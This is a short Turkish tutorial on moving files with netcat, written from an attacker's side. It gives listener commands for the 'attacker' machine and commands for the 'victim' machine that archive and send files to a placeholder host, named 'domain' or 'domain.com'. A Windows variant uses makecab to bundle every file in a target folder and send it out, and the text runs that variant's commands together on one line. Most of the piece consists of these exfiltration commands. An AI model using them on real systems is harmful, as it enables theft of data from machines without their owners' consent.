Netcat ile Dosya Aktarma

Netcat küçük ama çok kullanışlı bir araçtır, öyle ki kullanıcıya bir bilgisayardan başka bir bilgisayara dosya aktarma imkanı bile verir. Bunun için;

Saldırgan bilgisayarda dinleyici listener açmanızın ardından:

nc -l 3333 > received_file

Kurban taraftan dosya aktarmak için yapmanız gereken aşağıdaki şekilde netcat’i çalıştırmaktır:

nc domain 3333 < original_file

Peki, kurban bilgisayardaki dosyaların ne olduğunu bilmiyorsak ne yapmalıyız? Burada da akla gelen en kolay yöntem tabi ki dosyaları bir adla zip ya da tar formatında sıkıştırmak.

Linux tarafında çözüm oldukça bilindik, önce listener başlatırız:

netcat -l 4444 | tar xzvf –

Ardından da dosyaları tarball olarak sıkıştırarak göndeririz:

tar -czf – * | netcat domain.com 4444

Ancak Windows işletim sisteminde zip komut satırında bir sıkıştırma komutu olarak gelmez. Bu nedenle, benzer işlevi gören cab sıkıştırma yöntemini kullanmak akla yatkın görünüyor.

Yine önce saldırgan bilgisayarda bir listener açalım:

nc -l 3333 > file.cab

Ardından kurban Windows bilgisayarda aşağıdaki komutları çalıştırarak, hedef klasördeki tüm dosyaları cab dosyası olarak sıkıştırıp gönderelim:

dir /b /a-d > files.txt makecab /d “CabinetName1=file.cab” /files.txt cd disk1 nc domain 3333 < file.cab

Böylece kurban bilgisayardaki hedef klasör içinde yer alan tüm dosyaları isimlerini önceden bilmediğimiz halde kendi bilgisayarımıza önceden çekebilmiş olduk.